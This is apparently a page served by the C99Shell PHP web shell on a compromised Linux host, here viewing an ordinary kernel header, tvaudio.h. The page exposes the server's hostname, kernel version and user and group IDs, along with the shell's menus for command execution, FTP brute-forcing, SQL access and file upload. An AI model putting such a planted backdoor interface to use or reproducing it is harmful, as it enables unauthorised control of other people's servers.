!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-5.15.0-153/include/media/i2c/   drwxr-xr-x
Free 28.63 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     tvaudio.h (1.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
    tvaudio.h - definition for tvaudio inputs

    Copyright (C) 2006 Hans Verkuil (hverkuil@xs4all.nl)

*/

#ifndef _TVAUDIO_H
#define _TVAUDIO_H

/*
 * i2c bus addresses for the chips supported by tvaudio.c
 */

#define I2C_ADDR_TDA8425    0x82
#define I2C_ADDR_TDA9840    0x84
#define I2C_ADDR_TDA9874    0xb0 /* also used by 9875 */
#define I2C_ADDR_TDA9875    0xb0
#define I2C_ADDR_TDA8425    0x82
#define I2C_ADDR_TDA9840    0x84 /* also used by TA8874Z */
#define I2C_ADDR_TDA985x_L    0xb4 /* also used by 9873 */
#define I2C_ADDR_TDA985x_H    0xb6
#define I2C_ADDR_TDA9874    0xb0 /* also used by 9875 */
#define I2C_ADDR_TEA6300    0x80 /* also used by 6320 */
#define I2C_ADDR_TEA6420    0x98
#define I2C_ADDR_PIC16C54    0x96 /* PV951 */

/* The tvaudio module accepts the following inputs: */
#define TVAUDIO_INPUT_TUNER  0
#define TVAUDIO_INPUT_RADIO  1
#define TVAUDIO_INPUT_EXTERN 2
#define TVAUDIO_INPUT_INTERN 3

static inline const unsigned short *tvaudio_addrs(void)
{
    static const unsigned short addrs[] = {
        I2C_ADDR_TDA8425   >> 1,
        I2C_ADDR_TEA6300   >> 1,
        I2C_ADDR_TEA6420   >> 1,
        I2C_ADDR_TDA9840   >> 1,
        I2C_ADDR_TDA985x_L >> 1,
        I2C_ADDR_TDA985x_H >> 1,
        I2C_ADDR_TDA9874   >> 1,
        I2C_ADDR_PIC16C54  >> 1,
        I2C_CLIENT_END
    };

    return addrs;
}

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--